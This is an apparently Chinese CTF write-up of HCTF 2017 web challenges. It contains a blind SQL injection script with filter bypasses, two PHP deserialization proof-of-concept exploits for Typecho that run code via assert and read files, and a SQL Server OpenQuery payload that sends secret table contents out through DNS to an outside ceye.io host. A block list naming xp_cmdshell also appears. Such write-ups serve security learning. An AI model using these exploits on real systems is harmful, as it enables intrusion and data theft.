SQL Silencer
SQL盲注,用自己渣渣的脚本fuzzing了一波,过滤了很多东西:* 空格 limit for ......
用白大佬构造的payload:写盲注脚本:
#coding=UTF-8
import requests
result = ''
url = 'http://sqls.2017.hctf.io/index/index.php'
payload = '?id=1%0d%3C%3E%0d(select%0dcase%0dwhen%0d(ascii(substring(({sql})from%0d{list}))={num})%0dthen%0d(select%0d0)%0delse%0d(select%0d1)%0dend)'
for i in xrange(0,50):
for j in xrange(32,126):
hh = payload.format(sql='select%0dflag%0dfrom%0dhctf.flag%0dwhere%0dflag%0dlike%0d0x256863746625',list=str(i),num=str(j))
#print hh
zz = requests.get(url+hh)
#print zz.content
if 'Alice' in zz.content:
result += chr(j)
print result
break
跑出数据库hctf,题目给了表名flag
由于过滤了_不能查字段名,表名,select count(1)发现表里有2个字段
瞎猜字段名为flag,验证:selec count(flag)返回正确
模糊搜索select flag from hctf.flag where flag like hex(%flag%)
图片.png
本来以为是flag,刚开始各种尝试,发现是目录,但是返回403
于是乎开始跑另一个字段select flag from hctf.flag where flag not like hex(%flag%)
图片.png
这时候我激动了,于是乎这两个路径试来试去,然后问出题人说这不是脑洞!
........
http://sqls.2017.hctf.io/index/H3llo_111y_Fr13nds_w3lc0me_t0_hctf2017/index.php
一口老血........
Typecho前台序列化漏洞,但是没有写权限,只能读了。
poc
<?php
class Typecho_Request
{
private $_params = array();
private $_filter = array();
public function __construct()
{
// $this->_params['screenName'] = 'whoami';
$this->_params['screenName'] = 'print_r(scandir('/'))';
$this->_filter[0] = 'assert';
}
}
class Typecho_Feed
{
const RSS2 = 'RSS 2.0';
/** 定义ATOM 1.0类型 */
const ATOM1 = 'ATOM 1.0';
/** 定义RSS时间格式 */
const DATE_RFC822 = 'r';
/** 定义ATOM时间格式 */
const DATE_W3CDTF = 'c';
/** 定义行结束符 */
const EOL = "\n";
private $_type;
private $_items = array();
public $dateFormat;
public function __construct()
{
$this->_type = self::RSS2;
$item['link'] = '1';
$item['title'] = '2';
$item['date'] = 1507720298;
$item['author'] = new Typecho_Request();
$item['category'] = array(new Typecho_Request());
$this->_items[0] = $item;
}
}
$x = new Typecho_Feed();
$a = array(
'host' => 'localhost',
'user' => 'xxxxxx',
'charset' => 'utf8',
'port' => '3306',
'database' => 'typecho',
'adapter' => $x,
'prefix' => 'typecho_'
);
echo urlencode(base64_encode(serialize($a)));
?>
参考文章:
https://paper.seebug.org/424/
http://p0sec.net/index.php/archives/114/
还有大白的poc:
<?php
global $functionName;
global $evilParam;
$functionName = "assert";
$evilParam = "print_r(scandir('/'))";
$b = new Typecho_Feed();
$poc = array(
"adapter" => $b,
"prefix" => 1,
);
$data = serialize($poc);
$config = unserialize($data);
echo base64_encode($data).PHP_EOL;
class Typecho_Request
{
private $_params = array(
"screenName" => "",
"url" => "phpinfo");
private $_filter = array();
public function __construct()
{
global $functionName;
global $evilParam;
$this->_params['screenName'] = $evilParam;
$this->_filter = array($functionName);
}
}
class Typecho_Feed
{
/** 定义RSS 1.0类型 */
const RSS1 = 'RSS 1.0';
/** 定义RSS 2.0类型 */
const RSS2 = 'RSS 2.0';
/** 定义ATOM 1.0类型 */
const ATOM1 = 'ATOM 1.0';
private $_type;
const EOL = "\n";
private $_items = array();
public function __construct($version="1", $type = "ATOM 1.0", $charset = 'UTF-8', $lang = 'en')
{
$this->_version = $version;
$this->_type = $type;
$this->_charset = $charset;
$this->_lang = $lang;
$a = new Typecho_Request();
$b = new Typecho_Request();
$this->_items = array(array("author"=>$a,"category"=>array("name"=>$b)));
}
}
读到目录了:
$this->_params['screenName'] = 'print_r(scandir("/"))';
$this->_filter[0] = 'assert';
图片.png
继续读:
$functionName = "assert";
$evilParam = "print_r(scandir('/flag_is_here'))";
图片.png
$functionName = "assert";
$evilParam = "print_r(file_get_contents('/flag_is_here/flag'))";
图片.png
boring website
扫描一下,www.zip中有index.php的内容:
<?php
echo "Bob received a mission to write a login system on someone else's server, and he he only finished half of the work<br />";
echo "flag is hctf{what you get}<br /><br />";
error_reporting(E_ALL^E_NOTICE^E_WARNING);
try {
$conn = new PDO( "sqlsrv:Server=*****;Database=not_here","oob", "");
}
catch( PDOException $e ) {
die( "Error connecting to SQL Server".$e->getMessage() );
}
#echo "Connected to MySQL<br />";
echo "Connected to SQL Server<br />";
$id = $_GET['id'];
if(preg_match('/EXEC|xp_cmdshell|sp_configure|xp_reg(.*)|CREATE|DROP|declare|insert|into|outfile|dumpfile|sleep|wait|benchmark/i', $id)) {
die('NoNoNo');
}
$query = "select message from not_here_too where id = $id"; //link server: On linkname:mysql
$stmt = $conn->query( $query );
while ( @$row = $stmt->fetch( PDO::FETCH_ASSOC ) ){
//TO DO: ...
//It's time to sleep...
}
?>
因为我前面并没有做,
据说是sqlserver连接mysql的转换命令,再注入
参考文章:http://bobao.360.cn/learning/detail/3458.html
工具:http://ceye.io/records/dns
payload:
http://106.15.53.124:38324/?id=1; Select * from OpenQuery(mysql,'SELECT LOAD_FILE(CONCAT("\\\\",(select concat(id,name,password) from webwebweb.secret),".mysql.ip.port.xo2qpw.ceye.io\\abc"))');
网友评论